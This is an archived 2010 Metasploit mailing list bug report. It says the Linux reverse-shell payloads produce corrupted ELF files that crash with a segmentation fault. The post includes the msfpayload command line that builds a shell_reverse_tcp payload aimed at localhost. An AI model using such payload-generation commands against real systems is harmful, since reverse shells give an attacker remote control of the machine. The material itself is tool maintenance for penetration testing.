Metasploit mailing list archives

Linux payloads broken


From: Konrads Smelkovs <konrads () smelkovs com>
Date: Fri, 7 May 2010 11:21:03 +0300

konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/shell_reverse_tcp
LHOST=127.0.0.1 LPORT=80 X >out.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
 Length: 71
Options: LHOST=127.0.0.1,LPORT=80
konrads@konrads-laptop:~/msf2$ file out.elf
out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, *corrupted section header size*
konrads@konrads-laptop:~/msf2$ chmod +x out.elf
konrads@konrads-laptop:~/msf2$ ./out.elf
*Segmentation fault*
konrads@konrads-laptop:~/msf2$ uname -a
Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 05:23:09
UTC 2010 i686 GNU/Linux


Same for metsvc_reverse_tcp payload
--
Konrads Smelkovs
Applied IT sorcery.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: